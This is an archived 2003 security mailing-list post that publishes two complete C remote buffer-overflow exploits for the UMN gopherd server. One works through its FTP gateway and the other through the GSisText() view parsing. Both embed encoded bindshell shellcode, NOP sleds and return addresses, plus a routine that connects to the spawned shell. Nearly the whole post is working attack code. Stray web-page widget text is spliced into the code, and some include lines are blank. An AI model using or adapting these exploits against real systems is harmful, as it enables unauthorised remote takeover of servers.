Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > vuln-dev > 03 > 070676.html (Request Expert securityfocus.com Support)

UMN gopherd[2.x.x/3.x.x]: ftp gateway, and GSisText() buffer overflow exploits.

From: Vade 79 <v9(at)fakehalo.deadpig.org>
Date: Fri Jul 11 2003 - 02:30:30 EDT
('binary' encoding is not supported, stored as-is) bordom/fun audit time... posting these here too.

been awhile since i did an audit of UMN(University of Minnesota) gopherd+ daemon. figured i would check out the newer v3.0.x series, which has cleaned up the past security issues... while the old issues are resolved, still a few leftovers. two exploits follow...

original sources:
 http://fakehalo.deadpig.org/xgopherd2k3-ftp.c  http://fakehalo.deadpig.org/xgopherd2k3-view.c

  • exploit: xgopherd2k3-ftp.c --------------------- 
/*[ UMN gopherd[2.x.x/3.x.x]: remote "ftp gateway" buffer overflow. ]*

 *                                                                   *

 * by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo/realhalo)         *

 *                                                                   *

 * three years since last audit, code is a little more secure.  but, *

 * still found a few potentially exploitable situations.  this       *

 * exploits the "ftp gateway" feature of gopherd.  the gateway is    *

 * intended to act as a proxy of sorts.  between the server, and the *

 * client.  the bug occurs when gopherd attempts to read a ftp       *

 * list(LIST), and strcpy()'s the filename without checking the      *

 * length.  an example would look like this(including where to put   *

 * the shellcode at):                                                *

 *                                                                   *

 * "-rwxrwxrwx 1 <shellcode> root 1 Dec 31 23:59 <long string>"      *

 *                                                                   *

 * to exploit this, there needs to be a fake ftp daemon of sorts.    *

 * and, do to the nature of gopherd's "ftp gateway" support, must be *

 * on port 21.  which means this exploit needs to run as root.       *

 *                                                                   *

 * when exploiting this bug, it is made moderately easy by gopherd.  *

 * because, the buffer that holds the string is 8192 bytes, and on   *

 * the stack.  meaning the amount of NOPs used can be around ~7500.  *

 *                                                                   *

 * requirements(general):                                            *

 *  gopherd must have "ftp gateway" support included on compile,     *

 *  this is true by default.  but, the "--disable-ftp" configure     *

 *  option will make exploitation of this bug impossible.            *

 *                                                                   *

 * requirements(for this exploit):                                   *

 *  the server must be running linux/x86(what i made the exploit     *

 *  for).  gopherd must be started in the root directory "/",        *

 *  running with the -c command line option, or started as non-root. *

 *  any of those three situations will allow for successful          *

 *  exploitation.  this does not mean it is impossible to exploit    *

 *  otherwise.  but, gopherd will be in a chroot()'d state.  and, as *

 *  of the 2.4 kernel series, i have seen no such way to break       *

 *  chroot.  if it is desired to still run code, even in a limited   *

 *  environment, simply change the shellcode to your likings.  also, *

 *  the exploit must be ran as root, to bind to port 21.             *

 *                                                                   *

 * bug location(gopher-3.0.5/gopherd/ftp.c):                         *

 *  1800:int                                                         *

 *  1801:GopherFile(FTP *ftp, char *buf, char *theName)              *

 *  1802:{                                                           *

 *  ...                                                              *

 *  1805:char tmpName[256];                                          *

 *  ...                                                              *

 *  1811:strcpy(tmpName, buf);                                       *

 *                                                                   *

 * vulnerable versions:                                              *

 *  v3.0.5, v3.0.4, v3.0.3, v3.0.2, v3.0.1, v3.0.0(-1),              *

 *  v2.3.1. (patch level 0 through 15/all 2.3.1 versions)            *

 *  (it is assumed versions before 2.3.1 are vulnerable as well)     *

 *                                                                   *

 * tested on platforms(with no code changes/offsets):                *

 *  RedHat7.1, 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686           *

 *  Mandrake9.1, 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686 *

 *  (tested on both v3.0.5, and v2.3.1 sources / no changes.  this   *

 *  should apply to pretty much any generic linux, do to the amount  *

 *  of NOPs(~7500 bytes guessing room), and on the stack)            *

 *                                                                   *

 * example usage:                                                    *

 *  # cc xgopherd2k3-ftp.c -o xgopherd2k3-ftp                        *

 *  # ./xgopherd2k3-ftp localhost 127.0.0.1                          *

 *  [*] UMN gopherd[2.x.x/3.x.x]: remote buffer overflow exploit.    *

 *  [*] "UMN gopherd remote ftp gateway buffer overflow"             *

 *  [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)             *

 *                                                                   *

 *  [*] target: localhost:70 - localhost: 127.0.0.1 - offset: 0xbff$ *

 *                                                                   *

 *  [*] starting ftp daemon. (background)                            *

 *  [*] attempting to connect: localhost:70.                         *

 *  [*] connected successfully: localhost:70.                        *

 *  [?] +GOPHERD: "ftp://x:x@127.0.0.1".                             *

 *  [*] ftp daemon connection established.                           *

 *  [?] -FTPD: "SYST".                                               *

 *  [?] -FTPD: "USER x".                                             *

 *  [?] -FTPD: "PASS x".                                             *

 *  [?] -FTPD: "PORT 127,0,0,1,128,35".                              *

 *  [?] -FTPD: "LIST -F".                                            *

 *  [?] +FTPD: "-rwxrwxrwx 1 <shellcode(7800)> root 1 Dec 31 23:59 $ *

 *  [*] waiting for ftp daemon to finish. (ctrl-c if needed)         *

 *  [*] ftp daemon connection closed.                                *

 *  [*] checking to see if the exploit was successful.               *

 *  [*] attempting to connect: localhost:45295.                      *

 *  [*] successfully connected: localhost:45295.                     *

 *                                                                   *

 *  Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2$ *

 *  uid=13(gopher) gid=30(gopher) groups=0(root),1(bin),2(daemon),3$ *

 *                                                                   *

 * note: when using your "local ip", do not make it 127.0.0.1, like  *

 * in the example.  it must be the ip you connect to the internet    *


 * through. (not an local area network ip, or whatnot)               *


 *********************************************************************/
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* change defines at will. (cept EIPSIZE, not recommended)     */
#define CODESIZE 7800 /* part of buf[8192]/stack. (~-350)      */
#define EIPSIZE 292 /* riding a fine line, don't make too big. */
#define RETADDR 0xbfffe29b /* center of NOPs for me. (~+-3500) */
#define TIMEOUT 10 /* connection timeout. (general)            */

/* globals. */
static char x86_exec[]= /* bindshell(45295)&, netric/S-poly. */
 "\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49"
 "\x41\x49\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0"
 "\x06\x9e\x26\x86\xdb\x26\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88"
 "\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95\x06\xb0\x25\x25\x25\x3b"
 "\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28\x88\xd7\x27"
 "\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
 "\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b"
 "\xa2\x55\x5e\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85"
 "\x05\xa2\x55\x06\x95\x06\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85"
 "\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0\x85\xd7\xa2\x55\x0e\x98"
 "\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95\x06\x9e\x5e"
 "\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
 "\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37"

Do you need help?X

 "\x3e\x43\x5e\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2"
 "\x55\x06\x95\x15\xa2\x55\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0"
 "\x6e";
char ftp_ip[64+1];
unsigned short ftp_port=0;
pid_t ftp_pid=0;
/* return address offset. (arg3) */
unsigned int offset_ra=0;

/* functions. */
char *geteip(void);
char *getcode(void);
unsigned short ftpd_read(int);
void ftpd_handler(int,char *);
void ftpd_list(char *,unsigned short);
void ftpd(void);
void gopher_connect(char *,unsigned short,char *);
void getshell(char *,unsigned short);
void printe(char *,short);

/* signal handlers. */
void sig_ctrlc_wait(){if(ftp_pid)kill(ftp_pid,9);}
void sig_ctrlc_exit(){printe("ctrl-c abort.",1);}
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv){
 unsigned short gopher_port=70; /* default. */
 unsigned int i=0;
 char *gopher_host;
 printf("[*] UMN gopherd[2.x.x/3.x.x]: remote buffer o"
 "verflow exploit.\n[*] \"UMN gopherd remote ftp gatew"
 "ay buffer overflow\"\n[*] by: vade79/v9 v9@fakehalo."
 "deadpig.org (fakehalo)\n\n");
 if(argc<3){
  printf("[!] syntax: %s   [offset]\n\n",argv[0]);
  exit(1);
 }
 if(!(gopher_host=(char *)strdup(argv[1])))
  printe("main(): allocating memory failed",1);
 for(i=0;i3)
  offset_ra=atoi(argv[3]);
 printf("[*] target: %s:%d - localhost: %s - offset: 0x%.8x(+"
 "%u)\n\n",gopher_host,gopher_port,argv[2],RETADDR,offset_ra);
 signal(SIGINT,sig_ctrlc_wait);
 signal(SIGALRM,sig_alarm);
 /* start ftpd, as a different process. */
 switch(ftp_pid=fork()){
  case -1:

Do you need more help?X

   printe("fork() ftpd failure.",1);
   break;
  case 0:
   signal(SIGINT,SIG_DFL);
   ftpd();
   _exit(0);
   break;
  default:
   printf("[*] starting ftp daemon. (background)\n");    break;
 }
 gopher_connect(gopher_host,gopher_port,argv[2]);  /* gotta let the ftpd magic happen, plenty of time. */  printf("[*] waiting for ftp daemon to finish. (ctrl-c if"  " needed)\n");
 waitpid(ftp_pid,0,0);
 signal(SIGINT,sig_ctrlc_exit);
 getshell(gopher_host,45295); /* defined in shellcode. */  printf("[!] exploit failed.\n");
 exit(0);
}
char *geteip(void){
 unsigned int i=0;
 char *buf;
 if(!(buf=(char *)malloc(EIPSIZE+1)))
  printe("ftpd_read(): allocating memory failed.",1);  memset(buf,0x0,EIPSIZE+1);
 for(i=0;i<EIPSIZE;i+=4){*(long *)&buf[i]=(RETADDR+offset_ra);}  return(buf);
}
char *getcode(void){
 char *buf;
 if(!(buf=(char *)malloc(CODESIZE+1)))
  printe("getcode(): allocating memory failed",1); 
 memset(buf,0x90,(CODESIZE-strlen(x86_exec)));
 memcpy(buf+(CODESIZE-strlen(x86_exec)),x86_exec,
 strlen(x86_exec));
 return(buf);

}
unsigned short ftpd_read(int sock){
 char *buf;
 if(!(buf=(char *)malloc(4096+1)))
  return(1);
 memset(buf,0x0,4096+1);
 if(read(sock,buf,4096)<1)
  return(1);
 ftpd_handler(sock,buf);
 return(0);
}
void ftpd_handler(int sock,char *buf){
 unsigned int addr1,addr2,addr3,addr4,port1,port2,i;  /* clean up for display, changes nothing critical. */  for(i=0;i<strlen(buf);i++)
  if(buf[i]=='\r'||buf[i]=='\n')
   buf[i]=0x0;
 if(strlen(buf)){
  printf("[?] -FTPD: \"%s\".\n",buf);
  if(!strncmp("SYST",buf,4))
   dprintf(sock,"215 UNIX Type: L8\n"); 
  else if(!strncmp("USER ",buf,5))
   dprintf(sock,"331 login ok.\n");
  else if(!strncmp("PASS ",buf,5))

   dprintf(sock,"230 access granted.\n");   else if(!strncmp("PORT ",buf,5)){
   sscanf(buf,"PORT %u,%u,%u,%u,%u,%u",&addr1,&addr2,&addr3,    &addr4,&port1,&port2);
   memset(ftp_ip,0x0,64+1);
   snprintf(ftp_ip,64,"%u.%u.%u.%u",addr1,addr2,addr3,addr4);    ftp_port=((port1*256)+port2);
   dprintf(sock,"200 PORT command successful.\n");   }
  else if(!strncmp("LIST",buf,4)){
   dprintf(sock,"150 Opening connection.\n");    /* send the fake file list, the exploit itself. */    if(strlen(ftp_ip)&&ftp_port)
    ftpd_list(ftp_ip,ftp_port);
   dprintf(sock,"226 Transfer complete.\n");    sleep(1);
   /* nothing else of importance. */
   close(sock);
  }
 }
 return;
}
void ftpd_list(char *ip,unsigned short port){  int sock;
 struct hostent *t;
 struct sockaddr_in s;
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  s.sin_family=AF_INET;
 s.sin_port=htons(port);
 if((s.sin_addr.s_addr=inet_addr(ip))){
  if(!(t=gethostbyname(ip)))
   printe("couldn't resolve ftp_list hostname/ip.",1);   memcpy((char*)&s.sin_addr,(char*)t->h_addr,   sizeof(s.sin_addr));
 }
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))   printe("ftpd_list connection failed.",1);  alarm(0); 
 /* the exploit itself, what changes the EIP.     */
 /* i just put the shellcode where the user/owner */
 /* of the file would normally go, goes into the  */
 /* fat buf[8192] buffer, yummy.                  */
 printf("[?] +FTPD: \"-rwxrwxrwx 1 <shellcode(%u)> root "  "1 Dec 31 23:59 <eip(%u)>\".\n",CODESIZE,EIPSIZE);  dprintf(sock,"-rwxrwxrwx 1 %s root 1 Dec 31 23:59 %s\n",  getcode(),geteip());
 sleep(1); /* not needed, safe call. */
 close(sock);
 return;
}
void ftpd(void){
 int ssock,sock,salen,so=1,i=0;
 struct sockaddr_in ssa,sa;
 ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  /* just incase used multiple times, good habit anyways. */  setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));  /* not everywheres. */
#ifdef SO_REUSEPORT
 setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so)); #endif
 ssa.sin_family=AF_INET;
 /* must be default, gopherd limitations. :( */  ssa.sin_port=htons(21);
 ssa.sin_addr.s_addr=INADDR_ANY;
 if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)   printe("could not bind socket, ftpd already running?",1);  listen(ssock,1);
 bzero((char*)&sa,sizeof(struct sockaddr_in));  /* some things i just don't see the reason for. :/ */  salen=sizeof(sa);
 sock=accept(ssock,(struct sockaddr *)&sa,&salen);  close(ssock); /* close server socket. */  printf("[*] ftp daemon connection established.\n");  /* welcome! */
 dprintf(sock,"220 FakeFTPD.\n");
 while(!i)
  i=ftpd_read(sock);
 close(sock);
 printf("[*] ftp daemon connection closed.\n");  return;
}
void gopher_connect(char *hostname,unsigned short port, char *myip){
 int sock;
 struct hostent *t;
 struct sockaddr_in s;
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  s.sin_family=AF_INET;
 s.sin_port=htons(port);
 if((s.sin_addr.s_addr=inet_addr(hostname))){   if(!(t=gethostbyname(hostname)))
   printe("couldn't resolve gopher hostname.",1);   memcpy((char*)&s.sin_addr,(char*)t->h_addr,   sizeof(s.sin_addr));
 }
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))   printe("gopher connection failed.",1);  alarm(0);
 printf("[*] connected successfully: %s:%d.\n",hostname,port);  printf("[?] +GOPHERD: \"ftp://x:x@%s\".\n",myip);  sleep(1); /* had problems, without a delay here. */  dprintf(sock,"ftp://x:x@%s\n",myip);
 sleep(1); /* doesn't really matter, but to be safe. :/ */  /* leave gopher socket open, for the duration. */  return;
}
/* same getshell() routine as usual. */
void getshell(char *hostname,unsigned short port){  int sock,r;
 fd_set fds;
 char buf[4096+1];
 struct hostent *he;
 struct sockaddr_in sa;
 printf("[*] checking to see if the exploit was successful.\n");  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1){   printe("getshell(): socket() failed",0);   return;
 }
 sa.sin_family=AF_INET;
 if((sa.sin_addr.s_addr=inet_addr(hostname))){   if(!(he=gethostbyname(hostname))){
   printe("getshell(): couldn't resolve",0);    return;
  }
  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,   sizeof(sa.sin_addr));
 }
 sa.sin_port=htons(port);
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 printf("[*] attempting to connect: %s:%d.\n",  hostname,port);
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){   printf("[!] connection failed: %s:%d.\n",   hostname,port);
  return;
 }
 alarm(0);
 printf("[*] successfully connected: %s:%d.\n\n",  hostname,port);
 signal(SIGINT,SIG_IGN);
 write(sock,"uname -a;id\n",13);
 while(1){ 
  FD_ZERO(&fds);
  FD_SET(0,&fds);
  FD_SET(sock,&fds);

  if(select(sock+1,&fds,0,0,0)<1){
   printe("getshell(): select() failed",0);    return;
  }
  if(FD_ISSET(0,&fds)){
   if((r=read(0,buf,4096))<1){
    printe("getshell(): read() failed",0);     return;
   }
   if(write(sock,buf,r)!=r){
    printe("getshell(): write() failed",0);     return;
   }
  }
  if(FD_ISSET(sock,&fds)){
   if((r=read(sock,buf,4096))<1)
    exit(0);
   write(1,buf,r);
  }
 }
 close(sock);
 return;
}
void printe(char *err,short e){
 printf("[!] %s\n",err);
 if(e){
  /* don't want to exit with ftpd still running. */   if(ftp_pid)
   kill(ftp_pid,9);
  printf("[!] exploit failed.\n");
  exit(1);
 }
 return;
}
  • exploit: xgopherd2k3-view.c --------------------- 
/*[ UMN gopherd[2.x.x/3.x.x]: remote GSisText()/view buffer overflow. ]*

 *                                                                     *

 * by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo/realhalo)           *

 *                                                                     *

 * three years since last audit, code is a little more secure.  but,   *

 * still found a few potentially exploitable situations.  this         *

 * exploits the GSisText() object function in gopherd.  the function   *

 * is used in determining view-type.  the function does not check the  *

 * length of the string, which is copied into a temporary 64 byte      *

 * buffer.  an example would look like this(including where to put the *

 * shellcode at):                                                      *

 *                                                                     *

 * "g\t+<long string>\t1\n<shellcode(256 character max)>\n"            *

 *                                                                     *

 * to exploit this, the request must start with a h, 0, 4, 5, 9, s, I, *

 * or g.  followed by a <tab>+<long string>.  to have a place to put   *

 * the shellcode, i appeneded a <tab>1, which makes gopherd wait for   *

 * another line before actually doing the overflow.                    *

 *                                                                     * 

 * requirements(general):                                              *

 *  none.  no option to disable this, hard-coded upon compile.         *

 *                                                                     *

 * requirements(for this exploit):                                     *

 *  the server must be running linux/x86(what i made the exploit for). *

 *  gopherd must be started in the root directory "/", running with    *

 *  the -c command line option, or started as non-root.  any of those  *

 *  three situations will allow for successful exploitation.  this     *

 *  does not mean it is impossible to exploit otherwise.  but, gopherd *

 *  will be in a chroot()'d state.  and, as of the 2.4 kernel series,  *

 *  i have seen no such way to break chroot.  if it is desired to      *

 *  still run code, even in a limited environment, simply change the   *

 *  shellcode to your likings.                                         *

 *                                                                     *

 * bug location(gopher-3.0.5/object/GSgopherobj.c):                    *

 *  2088:boolean                                                       *

 *  2089:GSisText(GopherObj *gs, char *view)                           *

 *  2090:{                                                             *

 *  ...                                                                *

 *  2106:char viewstowage[64], *cp;                                    *

 *  2108:strcpy(viewstowage, view);                                    *

 *                                                                     *

 * vulnerable versions:                                                *

 *  v3.0.5, v3.0.4, v3.0.3, v3.0.2, v3.0.1, v3.0.0(-1),                *

 *  v2.3.1. (patch level 0 through 15/all 2.3.1 versions)              *

 *  (it is assumed versions before 2.3.1 are vulnerable as well)       *

 *                                                                     *

 * tested on platforms(with no code changes/offsets):                  *

 *  RedHat7.1, 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686             *

 *  Mandrake9.1, 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686   *

 *  (tested on both v3.0.5, and v2.3.1 sources / no changes)           *

 *                                                                     *

 * example usage:                                                      *

 *  # cc xgopherd2k3-view.c -o xgopherd2k3-view                        *

 *  # ./xgopherd2k3-view localhost                                     *

 *  [*] UMN gopherd[2.x.x/3.x.x]: remote buffer overflow exploit.      *

 *  [*] "UMN gopherd remote GSisText()/view buffer overflow"           *

 *  [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)               *

 *                                                                     *

 *  [*] target: localhost:70 - brute: 0xbfffe000-0xbfffffff            *

 *                                                                     *

 *  (. = 29 byte offset): ............................................ *

 *  .................................................................. *

 *  ................................................(hit shellcode!)   *

 *                                                                     *

 *  Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 200$ *
  • uid=13(gopher) gid=30(gopher) groups=0(root),1(bin),2(daemon),3(s$ * ***********************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <signal.h> #include <unistd.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <netinet/in.h> #include <arpa/inet.h> 
/* using brute force method, don't change values.                 */
#define CODESIZE 256 /* big as it gets, or will fail.             */
#define EIPSIZE 128 /* 64 byte buffer, little overboard. :)       */
#define BASEADDR 0xbfffe000 /* starting address, should be ok.    */
#define ENDADDR 0xbfffffff /* address to stop at.                 */
#define TIMEOUT 10 /* connection timeout. (general)               */

/* globals. */
static char x86_exec[]= /* bindshell(45295)&, netric/S-poly. */ 

 "\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49"
 "\x41\x49\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0"
 "\x06\x9e\x26\x86\xdb\x26\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88"
 "\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95\x06\xb0\x25\x25\x25\x3b"
 "\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28\x88\xd7\x27"
 "\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
 "\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b"
 "\xa2\x55\x5e\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85"
 "\x05\xa2\x55\x06\x95\x06\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85"
 "\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0\x85\xd7\xa2\x55\x0e\x98"
 "\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95\x06\x9e\x5e"

Can we help you?X

 "\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
 "\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37"
 "\x3e\x43\x5e\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2"
 "\x55\x06\x95\x15\xa2\x55\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0"
 "\x6e";

/* functions. */
char *geteip(unsigned int);
char *getcode(void);
unsigned short gopher_connect(char *,unsigned short, unsigned int);
void getshell(char *,unsigned short);
void printe(char *,short);

/* signal handlers. */
void sig_ctrlc(){printe("aborted",1);}
void sig_alarm(){printe("alarm/timeout hit",1);}

/* begin. */
int main(int argc,char **argv){
 unsigned short gopher_port=70; /* default. */  unsigned int offset=0,i=0;
 char *gopher_host; 

 printf("[*] UMN gopherd[2.x.x/3.x.x]: remote buffer o"
 "verflow exploit.\n[*] \"UMN gopherd remote GSisText("
 ")/view buffer overflow\"\n[*] by: vade79/v9 v9@fakeh"
 "alo.deadpig.org (fakehalo)\n\n");
 if(argc<2){
  printf("[!] syntax: %s <hostname[:port]>\n\n",argv[0]);   exit(1);
 }
 if(!(gopher_host=(char *)strdup(argv[1])))   printe("main(): allocating memory failed",1);  for(i=0;i<strlen(gopher_host);i++)
  if(gopher_host[i]==':')
   gopher_host[i]=0x0;
 if(index(argv[1],':'))
  gopher_port=atoi((char *)index(argv[1],':')+1);  if(!gopher_port)
  gopher_port=70;
 printf("[*] target: %s:%d - brute: 0x%.8x-0x%.8x\n\n",  gopher_host,gopher_port,BASEADDR,ENDADDR);  signal(SIGINT,sig_ctrlc);
 signal(SIGALRM,sig_alarm);
 fprintf(stderr,"(. = 29 byte offset): ");  for(offset=0;(BASEADDR+offset)<ENDADDR;offset+=29){   fprintf(stderr,(gopher_connect(gopher_host,gopher_port,   offset)?"!":"."));
  getshell(gopher_host,45295); /* defined in shellcode. */  }
 fprintf(stderr,"(brute force limit hit)\n");  exit(0);
}
char *geteip(unsigned int offset){
 unsigned int i=0;
 char *buf;
 if(!(buf=(char *)malloc(EIPSIZE+1)))
  printe("ftpd_read(): allocating memory failed.",1);  memset(buf,0x0,EIPSIZE+1);
 for(i=0;i<EIPSIZE;i+=4){*(long *)&buf[i]=(BASEADDR+offset);}  return(buf);
}
char *getcode(void){
 char *buf;
 if(!(buf=(char *)malloc(CODESIZE+1)))
  printe("getcode(): allocating memory failed",1); 
 memset(buf,0x90,(CODESIZE-strlen(x86_exec)));
 memcpy(buf+(CODESIZE-strlen(x86_exec)),x86_exec,
 strlen(x86_exec));
 return(buf);

}
unsigned short gopher_connect(char *hostname, unsigned short port,unsigned int offset){  int sock;
 struct hostent *t;
 struct sockaddr_in s;
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  s.sin_family=AF_INET;
 s.sin_port=htons(port);
 if((s.sin_addr.s_addr=inet_addr(hostname))){   if(!(t=gethostbyname(hostname))){
   close(sock);
   return(1);
  }
  memcpy((char*)&s.sin_addr,(char*)t->h_addr,   sizeof(s.sin_addr));
 }
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s))){   alarm(0);
  close(sock);
  return(1);
 }
 alarm(0);
 usleep(500000); /* had problems, without a delay here. */  /* the exploit itself. */
 dprintf(sock,"g\t+%s\t1\n",geteip(offset)); /* 64 bytes. */  dprintf(sock,"%s\n",getcode()); /* 256 bytes room. */  usleep(500000);
 close(sock); /* done. */
 return(0);
}
/* same getshell() routine, a little modded for brute. */ void getshell(char *hostname,unsigned short port){  int sock,r;
 fd_set fds;
 char buf[4096+1];
 struct hostent *he;
 struct sockaddr_in sa;
 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)   return;
 sa.sin_family=AF_INET;
 if((sa.sin_addr.s_addr=inet_addr(hostname))){   if(!(he=gethostbyname(hostname))){
   close(sock);
   return;
  }
  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,   sizeof(sa.sin_addr));
 }
 sa.sin_port=htons(port);
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){   alarm(0);
  close(sock);
  return;
 }
 alarm(0);
 fprintf(stderr,"(hit shellcode!)\n\n");  signal(SIGINT,SIG_IGN);
 write(sock,"uname -a;id\n",13);
 while(1){ 
  FD_ZERO(&fds);
  FD_SET(0,&fds);
  FD_SET(sock,&fds);

  if(select(sock+1,&fds,0,0,0)<1){
   printe("getshell(): select() failed",0);    return;
  }
  if(FD_ISSET(0,&fds)){
   if((r=read(0,buf,4096))<1){
    printe("getshell(): read() failed",0);     return;
   }
   if(write(sock,buf,r)!=r){
    printe("getshell(): write() failed",0);     return;
   }
  }
  if(FD_ISSET(sock,&fds)){
   if((r=read(sock,buf,4096))<1)
    exit(0);
   write(1,buf,r);
  }
 }
 close(sock);
 return;
}
void printe(char *err,short e){
 fprintf(stderr,"(error: %s)\n",err);
 if(e)
  exit(1);
 return;
} Received on Fri Jul 11 19:29:30 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library